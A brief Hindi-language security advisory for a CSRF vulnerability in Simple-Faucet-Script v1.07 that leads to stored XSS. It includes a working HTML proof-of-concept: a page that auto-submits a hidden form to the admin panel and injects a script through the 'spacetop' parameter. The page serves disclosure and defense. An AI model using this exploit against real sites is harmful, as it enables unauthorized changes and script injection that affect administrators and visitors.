
CVE-2025-57310 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Simple-Faucet-Script v1.07 में CSRF भेद्यता, जो एडमिन पैनल पर क्राफ्टेड POST अनुरोधों के माध्यम से स्टोर्ड XSS को सक्षम बनाती है।
Salmen2/Simple-Faucet-Script v1.07 में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता, जो admin.php?p=ads&c=1 पर भेजे गए क्राफ्टेड POST अनुरोध के माध्यम से हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।
CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
यह उत्पाद एडमिन पैनल पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के प्रति संवेदनशील है। जब एक प्रमाणित एडमिन PoC युक्त किसी दुर्भावनापूर्ण पृष्ठ पर जाता है, तो CSRF हमला होमपेज सामग्री में अनधिकृत संशोधन का कारण बनता है।
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
एक हमलावर spacetop पैरामीटर के माध्यम से होमपेज पर मनमाना HTML/JavaScript इंजेक्ट कर सकता है, जिससे स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) उत्पन्न होती है।